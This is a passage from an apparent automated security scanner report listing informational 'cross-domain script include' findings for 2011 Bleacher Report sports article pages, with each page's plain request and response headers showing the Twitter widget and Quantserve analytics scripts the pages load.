<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.23. http://bleacherreport.com/articles/608517-nfl-free-agency-25-bargain-buys-that-could-make-an-impact-in-2011  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608517-nfl-free-agency-25-bargain-buys-that-could-make-an-impact-in-2011

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608517-nfl-free-agency-25-bargain-buys-that-could-make-an-impact-in-2011 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 169
ETag: "c4535547d2e042b80dcf88d78dd8ce7b"
Date: Tue, 15 Feb 2011 15:53:20 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 93654
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.24. http://bleacherreport.com/articles/608546-nfl-positional-power-ranking-the-top-5-running-backs-after-the-2010-season  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608546-nfl-positional-power-ranking-the-top-5-running-backs-after-the-2010-season

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608546-nfl-positional-power-ranking-the-top-5-running-backs-after-the-2010-season HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 73
ETag: "88aa58d32e9a92e71a23912d8acfe714"
Date: Tue, 15 Feb 2011 15:53:27 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 72339
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.25. http://bleacherreport.com/articles/608624-ufc-top-5-pound-for-pound-fighters-in-the-world  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608624-ufc-top-5-pound-for-pound-fighters-in-the-world

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608624-ufc-top-5-pound-for-pound-fighters-in-the-world HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 645
ETag: "a6e70f8fcc699082f11349d6237c6b1c"
Date: Tue, 15 Feb 2011 15:53:54 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 70150
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.26. http://bleacherreport.com/articles/608707-jimmie-johnson-10-reasons-he-wont-win-another-nascar-sprint-cup-title-in-201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608707-jimmie-johnson-10-reasons-he-wont-win-another-nascar-sprint-cup-title-in-201

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608707-jimmie-johnson-10-reasons-he-wont-win-another-nascar-sprint-cup-title-in-201 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 97
ETag: "9b80f9a1c1fafd399967c03aad317c4e"
Date: Tue, 15 Feb 2011 15:53:54 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 70035
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.27. http://bleacherreport.com/articles/608718-2011-college-football-top-25-predictions-10-best-running-backs-in-the-top-25  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608718-2011-college-football-top-25-predictions-10-best-running-backs-in-the-top-25

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608718-2011-college-football-top-25-predictions-10-best-running-backs-in-the-top-25 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 473
ETag: "87d5813be3de8e4773ad183afcfc73b4"
Date: Tue, 15 Feb 2011 15:53:33 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 75909
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.28. http://bleacherreport.com/articles/608896-listen-to-larry-fitzgerald-kevin-kolb-to-arizona-cardinals-makes-perfect-sense  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608896-listen-to-larry-fitzgerald-kevin-kolb-to-arizona-cardinals-makes-perfect-sense

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608896-listen-to-larry-fitzgerald-kevin-kolb-to-arizona-cardinals-makes-perfect-sense HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 321
ETag: "bc07dedd39691d2c48f995f1880c6d74"
Date: Tue, 15 Feb 2011 15:53:22 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 67248
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.29. http://bleacherreport.com/articles/608975-college-football-predictions-what-will-2011-season-bring-for-top-25-programs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608975-college-football-predictions-what-will-2011-season-bring-for-top-25-programs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/608975-college-football-predictions-what-will-2011-season-bring-for-top-25-programs HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 659
ETag: "751b1927112ef133b900bc7f645c99b8"
Date: Tue, 15 Feb 2011 15:53:29 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 93944
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.30. http://bleacherreport.com/articles/609071-kris-versteeg-headed-to-philadelphia-brain-burke-lands-first-rounder  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609071-kris-versteeg-headed-to-philadelphia-brain-burke-lands-first-rounder

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609071-kris-versteeg-headed-to-philadelphia-brain-burke-lands-first-rounder HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 424
ETag: "38ec8bbafa7274a003fb330bb60089cc"
Date: Tue, 15 Feb 2011 15:53:43 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 61459
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.31. http://bleacherreport.com/articles/609142-jadeveon-clowney-deserves-some-time-to-grow-at-south-carolina  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609142-jadeveon-clowney-deserves-some-time-to-grow-at-south-carolina

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609142-jadeveon-clowney-deserves-some-time-to-grow-at-south-carolina HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 223
ETag: "1666f9a5eca7b6f1d1863a06e7251a40"
Date: Tue, 15 Feb 2011 15:53:31 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 64599
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.32. http://bleacherreport.com/articles/609206-hey-hey-hey-albert-haynesworth-keeping-the-police-busy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609206-hey-hey-hey-albert-haynesworth-keeping-the-police-busy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609206-hey-hey-hey-albert-haynesworth-keeping-the-police-busy HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 559
ETag: "f4af7bffe5449fc48d4d4a5f375eb00a"
Date: Tue, 15 Feb 2011 15:53:51 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 61941
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.33. http://bleacherreport.com/articles/609211-nfl-power-rankings-the-10-best-former-texas-longhorns-currently-in-the-league  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609211-nfl-power-rankings-the-10-best-former-texas-longhorns-currently-in-the-league

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609211-nfl-power-rankings-the-10-best-former-texas-longhorns-currently-in-the-league HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 480
ETag: "5210698230950a27c7e2f359bcec386c"
Date: Tue, 15 Feb 2011 15:53:27 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 75873
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.34. http://bleacherreport.com/articles/609250-nfl-draft-2011-which-kingdom-will-prince-amukamara-find-himself-in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609250-nfl-draft-2011-which-kingdom-will-prince-amukamara-find-himself-in

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609250-nfl-draft-2011-which-kingdom-will-prince-amukamara-find-himself-in HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 143
ETag: "a0b5e19be5a4f2e91dcd974c1add84ec"
Date: Tue, 15 Feb 2011 15:53:25 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 62755
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.35. http://bleacherreport.com/articles/609299-nfl-draft-2011-examining-the-detroit-lions-1st-round-options  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609299-nfl-draft-2011-examining-the-detroit-lions-1st-round-options

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609299-nfl-draft-2011-examining-the-detroit-lions-1st-round-options HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 178
ETag: "121867dda3039eb48665db719990366a"
Date: Tue, 15 Feb 2011 15:53:26 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 76467
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.36. http://bleacherreport.com/articles/609328-houston-rockets-the-10-biggest-hurdles-between-the-team-and-the-playoffs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609328-houston-rockets-the-10-biggest-hurdles-between-the-team-and-the-playoffs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609328-houston-rockets-the-10-biggest-hurdles-between-the-team-and-the-playoffs HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 771
ETag: "eb3eaca217a640f677ca40cbb9e3e8ba"
Date: Tue, 15 Feb 2011 15:54:15 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 76580
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.37. http://bleacherreport.com/articles/609334-portland-trail-blazers-and-the-10-biggest-jekyll-and-hyde-teams-in-the-nba  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609334-portland-trail-blazers-and-the-10-biggest-jekyll-and-hyde-teams-in-the-nba

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609334-portland-trail-blazers-and-the-10-biggest-jekyll-and-hyde-teams-in-the-nba HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 89
ETag: "32acbe38b85412c783b295e4585408d9"
Date: Tue, 15 Feb 2011 15:53:23 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 79795
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.38. http://bleacherreport.com/articles/609380-la-lakers-10-flaws-the-lakers-must-repair-before-becoming-contenders-once-again  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609380-la-lakers-10-flaws-the-lakers-must-repair-before-becoming-contenders-once-again

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609380-la-lakers-10-flaws-the-lakers-must-repair-before-becoming-contenders-once-again HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 163
ETag: "9231c54d6249ba788eb2e3d6ea206a58"
Date: Tue, 15 Feb 2011 15:53:21 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 74890
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.39. http://bleacherreport.com/articles/609453-2011-ncaa-tournament-finding-a-george-mason-in-a-crowd-of-68  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609453-2011-ncaa-tournament-finding-a-george-mason-in-a-crowd-of-68

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609453-2011-ncaa-tournament-finding-a-george-mason-in-a-crowd-of-68 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 567
ETag: "dcdba6841f31397b4a45ee41e3845670"
Date: Tue, 15 Feb 2011 15:53:22 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 73622
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.40. http://bleacherreport.com/articles/609540-bob-cousy-rajon-rondo-and-the-top-10-guards-in-boston-celtics-history  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609540-bob-cousy-rajon-rondo-and-the-top-10-guards-in-boston-celtics-history

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609540-bob-cousy-rajon-rondo-and-the-top-10-guards-in-boston-celtics-history HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 146
ETag: "4e566a1eda617d8c540e8f76f682ad8c"
Date: Tue, 15 Feb 2011 15:53:24 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 87532
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.41. http://bleacherreport.com/articles/609576-daytona-500-dale-earnhardt-and-the-most-impressive-victories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609576-daytona-500-dale-earnhardt-and-the-most-impressive-victories

Issue detail

The response dynamically includes the following scripts from other domains:

Request

